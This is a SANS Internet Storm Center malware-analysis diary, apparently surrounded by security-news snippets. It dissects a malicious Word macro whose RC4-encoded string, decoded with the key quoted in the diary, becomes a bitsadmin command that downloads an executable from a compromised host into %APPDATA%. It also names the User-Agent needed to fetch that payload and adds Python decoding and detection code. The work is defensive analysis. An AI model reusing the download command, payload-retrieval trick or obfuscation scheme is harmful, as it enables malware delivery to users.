Hackin9


Earlier this week, mass panic ensued when a security firm reported the recovery of a whopping 272 million account credentials belonging to users of Gmail, Microsoft, Yahoo, and a variety of overseas services. "Big data breaches found at major email services" warned Reuters, the news service that broke the news. Within hours, other news services were running stories based on the report with headlines like "Tech experts: Change your email password now."

Since then, both Google and a Russia-based e-mail service unveiled analyses that call into question the validity of the security firm's entire report.

"More than 98% of the Google account credentials in this research turned out to be bogus," a Google representative wrote in an e-mail. "As we always do in this type of situation, we increased the level of login protection for users that may have been affected." According to the report, the compromised credential list included logins to almost 23 million Gmail accounts.


 

Softpedia News

Lenovo Bloatware Patched to Fix System Takeover Bug
This incident became infamous in infosec circles as Superfish. Later in December, security researchers from LizardHQ discovered three different issues in the bloatware of Dell, Toshiba, and Lenovo devices. In that incident, Lenovo's Solution Center ...
 

Engadget

How Armenian gangsters blew up the fingerprint-password debate
Surfacing in the news this week with drama, it's an unprecedented revelation that has divided legal experts and given our collective Big Brother paranoia and infosec hysteria a shot in the arm that we really didn't need. The decision came in record ...

 
Re: ManageEngine Applications Manager Build No: 12700 Information Disclosure and Un-Authenticated SQL injection.
 
ManageEngine Applications Manager Build No: 12700 Information Disclosure and Un-Authenticated SQL injection.
 

Techworm

Google competitor DuckDuckGo is giving away $225000 to support open source
Itsy bitsy Google competitor DuckDuckGo is doing its bit to help support open source. It doesn't have a big money purse like Google, but it is giving away $225,000 to support open source development. Paoli-based DuckDuckGo is a search engine that doesn ...
 

ay ago, I found an interesting malicious Word document. First of all, the file has a very low score on VT: 2/56 (analysis is available here). The document is a classic one: once opened, it asks the victim to enable macro execution if not yet enabled. The document targets ... [screenshot of the document not preserved in this copy]

The OLE document contains:

```
$ oledump.py b2a9d203bb135b54319a9e5cafc43824
  1:       113 \x01CompObj
  2:      4096 \x05DocumentSummaryInformation
  3:      4096 \x05SummaryInformation
  4:      9398 1Table
  5:    193456 Data
  6:       448 Macros/PROJECT
  7:        41 Macros/PROJECTwm
  8: M   18073 Macros/VBA/ThisDocument
  9:      3584 Macros/VBA/_VBA_PROJECT
 10:       522 Macros/VBA/dir
 11:      4096 WordDocument
```

The analysis of the macro is straightforward. The entry point passes a long hex string to a decoding function (the string literal's quotes were lost in this copy and are restored here):

```vb
ushdushdu = FlushCells("776129CAECFBE48F01DAC78C40B872BB1A005253F63151B2B093CA272A3C6DE382BE1AAA6586BDBC2E6579E5AF8A0BDE5D798979972BD193590479E79DBC27BD7B085F20B0304720326D6426885FD2B14A84D6A55FADF25589DF1D2B8DC244B62008AB4DB9BBDBE715C1F1EF29AFCDB1DA4DEA5F3020B871E02BA9CD4DE638D7FBB903A1D95A11F3F7816FE6BB237F3688217CBB8C3C3351C8BA766C054B4F7D0F35C35B074241D93F74F2A02BCD79251D3511CC770CF503A2409FF5C9944ADE53B2685A0968FB466874AF8929C7A82827726278EC4B4076AA84AC430150AFB20C3A4DC94B264C2382DDA6A9F70C17D8618B0A0759340A4D840D2A222612125892136E316DF67ED314739477463BF101C06454BCA61F9B45BA7A82CDD6FB24A3A678C3A1E804955CAB28A3036D0C86B2A38FDDC270B538C2394982AF2B206507927DA47885E53BD9B4A0E196EA4B05FE")
```

The function FlushCells is used to decode this string. It converts the hex pairs to bytes and then runs a plain RC4 decryption with a hard-coded passphrase as the key (the `&` concatenation operators and the string quotes were lost in this copy and are restored; `Dec()` and `RC4Initialize` are defined elsewhere in the macro and are not shown in the diary):

```vb
Public Function FlushCells(text)
    Dim sbox(256) As Integer
    Dim key(256) As Integer
    Dim Text2 As String
    Dim temp As Integer
    Dim a As Long
    Dim i As Integer
    Dim j As Integer
    Dim k As Long
    Dim w As Integer
    Dim cipherby As Integer
    Dim cipher As String
    ' Step 1: hex string -> raw bytes, two characters at a time
    For w = 1 To Len(text) Step 2
        Text2 = Text2 & Chr(Dec(Mid$(text, w, 2)))
    Next
    i = 0
    j = 0
    jkddd = skdjr    ' junk statement, does nothing useful
    ' Step 2: RC4 key schedule with the hard-coded passphrase
    encryptkey = "Trafalgar picnicking widower insights competitors leprechaun windmilling primp dueling campers"
    RC4Initialize encryptkey, key, sbox
    ' Step 3: RC4 keystream generation (PRGA) XORed with the ciphertext
    For a = 1 To Len(Text2)
        jkddd = jkddd + 1    ' junk statement; the operand was lost in extraction, 1 assumed
        i = (i + 1) Mod 256
        j = (j + sbox(i)) Mod 256
        temp = sbox(i)
        sbox(i) = sbox(j)
        sbox(j) = temp
        k = sbox((sbox(i) + sbox(j)) Mod 256)
        cipherby = Asc(Mid$(Text2, a, 1)) Xor k
        cipher = cipher & Chr(cipherby)
    Next
    FlushCells = cipher
End Function
```

The decoded string is the following command line (the `>` redirections and the `&` chaining operator were lost in this copy and are restored here):

```
ping 127.0.0.1 -n 3 > nul & bitsadmin /transfer myjob /download /priority high http://ads.metrofamilyzine.com/ef9a0c52/7e4ccb5.bin %APPDATA%\27dgdte72.exe > nul
```

This is the interesting part. Instead of using a classic Microsoft.XMLHTTP object, the macro downloads the payload via the tool Bitsadmin. Bitsadmin is a command line tool used to create download or upload jobs and monitor their progress. It is available by default since Windows 7 and Windows Server 2008 R2. BITS stands for Background Intelligent Transfer Service.

Bitsadmin uses its own specific User-Agent, which is checked by the compromised website to prevent direct downloads. You must use this one to access the payload: Microsoft BITS/7.5

```
$ wget --user-agent="Microsoft BITS/7.5" ...
```

The analysis of the payload is here (VT score: 4/56).
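To reproduce the decoding step outside of Word, here is an added Python equivalent of FlushCells (this is example code written for this page, not the macro author's code and not an ISC tool). It assumes that `RC4Initialize` is the standard RC4 key-scheduling algorithm and that `Dec()` turns a hex pair into its byte value; the key phrase is the one quoted in the macro, while the plaintext used for the round trip is a constructed stand-in, not the sample's real decoded command.

```python
# Added example: Python re-implementation of the macro's FlushCells() decoder.
# Assumption: RC4Initialize is standard RC4 KSA and Dec() is hex-pair -> int.

# Key phrase as quoted in the macro (the blob's real key); plaintext below is constructed.
SAMPLE_KEY = b"Trafalgar picnicking widower insights competitors leprechaun windmilling primp dueling campers"


def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: build the 256-entry S-box (the macro's RC4Initialize)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % len(key)]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
    return sbox


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """PRGA keystream XORed over data; mirrors the second loop of FlushCells.
    RC4 is symmetric, so the same call encrypts and decrypts."""
    sbox = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        k = sbox[(sbox[i] + sbox[j]) % 256]
        out.append(byte ^ k)
    return bytes(out)


def flush_cells(hex_blob: str, key: bytes) -> bytes:
    """Python equivalent of FlushCells: hex text -> bytes -> RC4 with `key`.
    Rejects odd-length or non-hex input instead of silently truncating it."""
    hex_blob = "".join(hex_blob.split())          # tolerate wrapped/pasted input
    if len(hex_blob) % 2 or any(c not in "0123456789abcdefABCDEF" for c in hex_blob):
        raise ValueError("argument is not an even-length hex string")
    return rc4_crypt(key, bytes.fromhex(hex_blob))


def encode_like_macro(plaintext: bytes, key: bytes) -> str:
    """Inverse direction (what the dropper author ran); used here only to build a test vector."""
    return rc4_crypt(key, plaintext).hex().upper()


def demo() -> bytes:
    """Round trip a constructed command through encode -> decode with the macro's key."""
    plaintext = b"ping 127.0.0.1 -n 3 > nul & echo constructed-sample > nul"
    blob = encode_like_macro(plaintext, SAMPLE_KEY)
    return flush_cells(blob, SAMPLE_KEY)


if __name__ == "__main__":
    print(demo().decode())
```

To apply it to a real sample, paste the hex argument of the FlushCells call and the key string from the macro into `flush_cells()`; if the decoded bytes are not readable text, the macro's `RC4Initialize` deviates from standard KSA and must be read before trusting the result.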
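The two traits described above, an Office process spawning a bitsadmin transfer job and a download carrying the "Microsoft BITS/" User-Agent to a non-Microsoft host, are both easy to check for in telemetry. The following added detection example (written for this page, not part of the diary or of any ISC tool) runs those two checks over constructed Sysmon-style process-creation records and constructed proxy log lines; the field names, the log line layout, the hosts and the trusted-host allowlist are all assumptions made for the example.

```python
# Added example: detection logic for Office -> bitsadmin downloads and BITS User-Agent
# traffic. All records, hosts and the allowlist below are constructed for this example.
import re
from urllib.parse import urlparse

# Office applications that should never be the parent of a BITS transfer job.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# bitsadmin verbs that create or feed a job; read-only verbs such as /list are ignored.
BITS_TRANSFER_VERBS = {"/transfer", "/addfile", "/create", "/resume", "/setnotifycmdline"}
# Hosts for which a "Microsoft BITS/" User-Agent is expected (assumed allowlist).
TRUSTED_BITS_SUFFIXES = ("windowsupdate.com", "microsoft.com")

# Constructed Sysmon-style process-creation records (a subset of Event ID 1 fields).
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer myjob /download /priority high "
                    r"http://ads.example.invalid/dl/payload.bin %APPDATA%\x.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /list"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c ping 127.0.0.1 -n 3 > nul & bitsadmin /transfer j "
                    r"/download http://ads.example.invalid/dl/a.bin %TEMP%\a.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe"},
]

# Constructed proxy log lines: "<timestamp> <client> \"<user-agent>\" <url>".
SAMPLE_PROXY_LINES = [
    '2016-05-06T10:00:01Z 10.0.0.12 "Microsoft BITS/7.5" http://ads.example.invalid/dl/payload.bin',
    '2016-05-06T10:00:05Z 10.0.0.12 "Microsoft BITS/7.5" http://download.windowsupdate.com/d/update.cab',
    '2016-05-06T10:00:09Z 10.0.0.13 "Mozilla/5.0" http://ads.example.invalid/index.html',
]
PROXY_LINE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) "(?P<ua>[^"]*)" (?P<url>\S+)$')


def bits_download_alert(event: dict):
    """Return a reason string when a process-creation event shows a suspicious
    bitsadmin transfer job, or None when nothing stands out."""
    cmd = event["CommandLine"].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if "bitsadmin" not in cmd:
        return None
    if not any(tok in BITS_TRANSFER_VERBS for tok in cmd.split()):
        return None                      # /list, /info, ... are routine admin use
    reasons = []
    if parent in OFFICE_PARENTS:
        reasons.append("BITS job created by Office process " + parent)
    if re.search(r"https?://", cmd) and re.search(r"%(appdata|localappdata|temp)%|\\users\\", cmd):
        reasons.append("remote URL saved to a user-writable path")
    if re.search(r"\.(exe|dll|scr)(\s|$)", cmd):
        reasons.append("destination has an executable extension")
    return "; ".join(reasons) if reasons else None


def _trusted(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in TRUSTED_BITS_SUFFIXES)


def bits_proxy_hits(lines):
    """Return (client, host, url) for BITS User-Agent requests to non-allowlisted hosts.
    This is a low-fidelity signal on its own: many updaters use BITS legitimately."""
    hits = []
    for line in lines:
        m = PROXY_LINE.match(line)
        if not m:
            continue                     # unparseable line: skip rather than crash
        if not m.group("ua").startswith("Microsoft BITS/"):
            continue
        url = m.group("url")
        host = (urlparse(url).hostname or "").lower()
        if _trusted(host):
            continue
        hits.append((m.group("client"), host, url))
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_PROCESS_EVENTS:
        reason = bits_download_alert(ev)
        if reason:
            print("ALERT:", reason, "|", ev["CommandLine"])
    for client, host, url in bits_proxy_hits(SAMPLE_PROXY_LINES):
        print("BITS UA to untrusted host:", client, host, url)
```

The process-creation check is the higher-fidelity one: an Office parent launching a transfer verb is rarely legitimate. The proxy check is meant to be correlated with it (same client, same minute) rather than alerted on alone.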

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status